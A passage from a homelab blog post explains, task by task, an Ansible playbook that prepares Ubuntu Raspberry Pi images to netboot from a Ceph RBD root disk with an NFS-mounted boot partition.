</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0440</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">validate</span>: <span style="color:#e6db74">&#39;visudo -cf %s&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set foobar password</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;{{ foobar_pw | password_hash(&#39;sha512&#39;) }}&#34;</span>
</span></span></code></pre></div><p>As this user will be quite powerful, I restrict SSH access to my command and
control machine&rsquo;s IP via the <code>from</code> option in the <code>authorized_keys</code> file.</p>
<p>This part of the setup expects the public key matching your Ansible controller&rsquo;s
private key to reside in a file called <code>ansible.pub</code>. Ansible will search a number
of <code>files/</code> directories to find it.</p>
<p>The user also needs sudo rights to function as an Ansible user. Here, I&rsquo;m
just giving it full rights in a separate <code>sudoers.d/</code> file, which is, in my
opinion, easier than mucking about with the <code>lineinfile</code> or similar modules on
the main sudoers file. Note especially the <code>validate: visudo -cf %s</code> option in
that task: it ensures that the new sudoers file is correctly formatted, so you
don&rsquo;t lock yourself out.</p>
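<p>For comparison, a rough sketch of the <code>lineinfile</code> route (not something this
playbook uses) would edit the shared <code>/etc/sudoers</code> file directly, which is
exactly the kind of fiddling the drop-in file avoids:</p>
<pre tabindex="0"><code>    - name: grant foobar sudo rights directly in /etc/sudoers (sketch only)
      lineinfile:
        path: /etc/sudoers
        line: "foobar ALL=(ALL:ALL) ALL"
        state: present
        validate: 'visudo -cf %s'
</code></pre>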
<p>Finally, the password is set. Here, I&rsquo;m taking the plaintext password from the
<code>foobar_pw</code> variable which we hand to Ansible in the Packer template file.
In my case, this password comes from my HashiCorp Vault instance, and Packer
then hands it to Ansible. The password hashing is important, as the <code>user</code>
module expects a hashed password rather than the plaintext one.</p>
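<p>One small detail worth knowing about <code>password_hash</code>: without a fixed salt it
generates a new hash on every run, so the task always reports a change. That
doesn&rsquo;t matter for a one-shot Packer build, but for a playbook you re-run, a
sketch with a static salt keeps it idempotent (the <code>foobar_salt</code> variable here
is made up, not part of my setup):</p>
<pre tabindex="0"><code>    - name: set foobar password with a fixed salt (sketch only)
      user:
        name: foobar
        state: present
        # foobar_salt is a hypothetical extra-var holding a fixed salt string
        password: "{{ foobar_pw | password_hash('sha512', foobar_salt) }}"
</code></pre>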
<h2 id="some-basic-config-for-initrd-and-kernel-cmdline">Some basic config for initrd and kernel cmdline</h2>
<p>The next two tasks just remove a few options from the kernel command line in
<code>/boot/firmware/cmdline.txt</code>. This is purely a matter of personal preference.</p>
<p>The final two tasks are more interesting. First, the initrd compression method
is changed. I observed a problem I couldn&rsquo;t pin down with unpacking the initrd
when using <code>lz4</code> compression, which became the default in Ubuntu 22.04. The bug
seems to be known and is being rolled back, but at the time I created the
playbook <code>lz4</code> was still the default, so the compression needs to be changed to
<code>gzip</code>. This is done with the following task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">switch initrd compression to gzip</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/initramfs-tools/conf.d/raspi-lz4.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">line</span>: <span style="color:#e6db74">&#34;COMPRESS=gzip&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;^COMPRESS=lz4$&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;644&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">create</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span></code></pre></div><p>The last task in this play is again a matter of personal preference. Ubuntu for
the Pi makes use of the flash-kernel tool. Before writing a new kernel to
<code>/boot/firmware</code>, this tool creates a backup of all the previous files, including
e.g. the initrd and the kernel itself. I don&rsquo;t need that, so I disabled it with
this Ansible task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Prevent automatic backups of files in /boot/firmware</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/default/flash-kernel</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">line</span>: <span style="color:#e6db74">&#34;NO_CREATE_DOT_BAK_FILES=yes&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span></code></pre></div><h2 id="setting-up-the-netboot">Setting up the netboot</h2>
<p>This is probably the part you&rsquo;re all here for. And we&rsquo;re only at line 471 of my
markdown file. &#x1f605;</p>
<p>The first thing we do here is again some housekeeping. By default, you can put
local <a href="https://cloud-init.io/">cloud-init</a> files into <code>/boot/firmware</code> to have them
loaded early in boot. This means the <code>cloud-init</code> service has a dependency on
<code>/boot</code> being mounted. But the <code>cloud-init</code> service is also a dependency for
networking to come up (because you can change the networking config in cloud-init).
With <code>/boot/firmware</code> located on an NFS mount when netbooting, there is now a
cycle in the systemd dependency tree: <code>cloud-init</code> -&gt; <code>/boot</code> -&gt; networking
-&gt; <code>cloud-init</code>. Hence, I remove the dependency between <code>/boot</code> and cloud-init
with this task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Remove /boot/firmware dependency for cloud-init-local service</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/systemd/system/cloud-init-local.service.d/mount-seed.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; </span>
</span></span></code></pre></div><p>This also means that the default cloud-init setup for Pis, which makes use of these
local files, will not work. I&rsquo;ve got the creation of a cloud-init server on
my list and will most likely write another article about it if I succeed.</p>
<p>The next two tasks fix a problem with the automatic Pi EEPROM update service
by adding a dependency on <code>/boot</code> being mounted.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create directory for rpi eeprom service file dropin</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/systemd/system/rpi-eeprom-update.service.d</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add dependency on boot/firmware mount for rpi eeprom service</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/eeprom-boot-mount-dep.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/systemd/system/rpi-eeprom-update.service.d/eeprom-boot-mount-dep.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span></code></pre></div><p>The second task installs a systemd drop-in file which adds a dependency on <code>/boot</code> being
mounted, as the boot files are required by this service.
The content of the <code>eeprom-boot-mount-dep.conf</code> file can again be found in
the <a href="https://gist.github.com/mmeier86/97d8d55073ebcd4c832d7cc8a76241e7">GitHub Gist</a>.</p>
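<p>I won&rsquo;t reproduce the Gist here, but for illustration, a drop-in expressing that kind of
dependency would look along these lines (a sketch only; the exact content of the real file
is an assumption):</p>
<pre tabindex="0"><code># eeprom-boot-mount-dep.conf (illustrative sketch, not the Gist&#39;s exact content)
[Unit]
# Make sure the firmware files are available before the EEPROM update runs
RequiresMountsFor=/boot/firmware
</code></pre>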
<h2 id="installing-nfs-tooling">Installing NFS tooling</h2>
<p>As NFS will be used to mount the <code>/boot</code> directory, we need to make sure that
the NFS client tooling is installed.</p>
<p>These two tasks accomplish that:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">setup name resolution</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">content</span>: <span style="color:#e6db74">&#34;nameserver 1.1.1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install NFS tools</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nfs-common</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>The DNS server setup here is necessary because we&rsquo;re working in a chroot, not
an actual VM. Hence, no DNS servers were configured via DHCP.</p>
<p>This needs to be undone in a later task, as <code>/etc/resolv.conf</code> is normally a
symlink managed by systemd which points to a file under <code>/run</code>, instead of being a
regular file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">replace temporary resolv.conf with correct symlink</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/run/systemd/resolve/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">link</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">force</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span></code></pre></div><h2 id="configuring-the-netboot-files">Configuring the netboot files</h2>
<p>The following tasks configure netbooting and all the files necessary to accomplish
it, most importantly the changes to the initramfs scripting that add the capability
to mount a Ceph RBD-based root disk:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/rbd-gen-hook.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs-tools/hooks/rbd-gen-hook.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot script</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/rbd-boot-script.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs-tools/scripts/rbd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>The two script files, <code>rbd-boot-script.sh</code> and <code>rbd-gen-hook.sh</code>, can be found
in <a href="https://gist.github.com/mmeier86/97d8d55073ebcd4c832d7cc8a76241e7">this Gist</a>.</p>
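<p>To give a rough idea of what such a hook looks like without reproducing the Gist:
initramfs-tools hooks follow a standard skeleton and use helpers like
<code>manual_add_modules</code> to pull kernel modules into the image. The following is only a
hedged sketch of that pattern, not the actual content of <code>rbd-gen-hook.sh</code>:</p>
<pre tabindex="0"><code>#!/bin/sh
# Illustrative initramfs-tools hook skeleton (not the real rbd-gen-hook.sh)
PREREQ=&#34;&#34;
prereqs() { echo &#34;$PREREQ&#34;; }
case &#34;$1&#34; in
    prereqs) prereqs; exit 0 ;;
esac
. /usr/share/initramfs-tools/hook-functions
# Make sure the rbd kernel module ends up in the initramfs
manual_add_modules rbd
</code></pre>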
<p>Next, the initramfs update itself is run:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup flash-kernel initramfs gen hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/tmp/initd-flash-kernel.sh.bak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temporarily delete flash-kernel initramfs hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install linux-modules-extra to get rbd kernel module</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">linux-modules-extra-raspi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">restore flash-kernel initramfs gen hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/tmp/initd-flash-kernel.sh.bak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">copy initrd to firmware partition</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/boot/initrd.img</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/boot/firmware/initrd.img</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span></code></pre></div><p>The procedure here is a little more involved. This is due, again, to the
fact that we are not working in an actually booted system, but in a chroot. This confuses the kernel
flashing tool <code>flash-kernel</code>, which is used to update the kernel on <code>/boot/firmware</code>,
because it cannot determine the running system&rsquo;s type.</p>
<p>The main problem is the installation of the <code>linux-modules-extra-raspi</code> package.
This package is needed for the <code>rbd</code> kernel module, which in turn is required
to mount the Ceph RBD root partition during the initramfs phase of
the boot.
To work around the problem, the configuration which runs the <code>flash-kernel</code> tool
at the end of an <code>update-initramfs</code> run is temporarily removed and then restored after
the initramfs has been regenerated as part of the <code>linux-modules-extra-raspi</code> install.</p>
<p>Finally, the new initrd image needs to be copied to the <code>/boot/firmware</code> directory
manually, because <code>flash-kernel</code>, which would normally do that, was switched off as
described above.</p>
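<p>Done by hand inside the chroot, the same dance would look roughly like this (just a
plain-shell sketch of what the tasks above automate):</p>
<pre tabindex="0"><code># Back up and remove the hook that runs flash-kernel after an initramfs update
cp /etc/initramfs/post-update.d/flash-kernel /tmp/initd-flash-kernel.sh.bak
rm /etc/initramfs/post-update.d/flash-kernel
# Installing this package regenerates the initramfs, now including the rbd module
apt-get install linux-modules-extra-raspi
# Put the hook back and copy the fresh initrd to the firmware partition manually
cp /tmp/initd-flash-kernel.sh.bak /etc/initramfs/post-update.d/flash-kernel
cp /boot/initrd.img /boot/firmware/initrd.img
</code></pre>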
<h2 id="setup-boot-partition">Setup boot partition</h2>
<p>The next two tasks set up the new, NFS-based boot partition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove old boot partition mount</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/fstab</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;.*/boot/firmware.*&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add NFS based boot partition</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mount</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;{{ &#39;/boot/firmware&#39; if hn_pi is defined else &#39;/boot&#39;  }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#e6db74">&#34;nfs-host:/picluster-boot/{{ hn_host_id if hn_pi is defined else hn_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fstype</span>: <span style="color:#ae81ff">nfs</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">opts</span>: <span style="color:#ae81ff">defaults,timeo=900,_netdev</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>This is reasonably simple. Each Pi gets its own directory on the NFS mount,
which is named after the Pi&rsquo;s serial number (see <code>cat /proc/cpuinfo</code>) and also
used in the netboot setup.</p>
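<p>For reference, the serial number can be read out like this (a small sketch; it assumes the
usual <code>Serial</code> line in a Pi&rsquo;s <code>/proc/cpuinfo</code>):</p>
<pre tabindex="0"><code># Print the Pi&#39;s serial number, which doubles as its directory name on the NFS share
awk &#39;/^Serial/ {print $3}&#39; /proc/cpuinfo
</code></pre>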
<h2 id="setting-the-kernel-command-line">Setting the kernel command line</h2>
<p>On Raspberry Pis, the kernel command line is defined in the file <code>/boot/firmware/cmdline.txt</code>.</p>
<p>In the following task, this file is adapted to add the necessary parameters
for netbooting from a Ceph RBD volume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot kernel command line arguments Pi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/boot/firmware/cmdline.txt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;(^dwc_otg.lpm_enable=0.*)$&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;\1 boot=rbd rbdroot=10.0.0.15,10.0.0.12,10.0.0.14:clusteruser:{{ hn_ceph_key }}:pi-cluster:{{ hn_hostname }}::_netdev,noatime&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span></code></pre></div><p>These parameters are not actually used by the kernel, but forwarded to the
<code>init</code> binary the kernel calls once it is done with early initialization. When
an initramfs is used, this <code>init</code> binary is actually a shell script which
mounts the real root partition and then hands control over to the <code>init</code> binary on that
partition.</p>
<p>The meaning of the parameters is described in detail in my <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/#booting-from-a-ceph-rbd-volume">previous post</a> on setting up the initramfs.</p>
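<p>With the template filled in, the relevant part of <code>cmdline.txt</code> ends up looking
roughly like this (the key, the host name and the pre-existing arguments are placeholders):</p>
<pre tabindex="0"><code>dwc_otg.lpm_enable=0 [existing arguments] boot=rbd rbdroot=10.0.0.15,10.0.0.12,10.0.0.14:clusteruser:&lt;ceph key&gt;:pi-cluster:&lt;hostname&gt;::_netdev,noatime
</code></pre>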
<h2 id="final-little-housekeeping">Final little housekeeping</h2>
<p>The last task in the playbook does another necessary piece of housekeeping, this
time for permissions:</p>
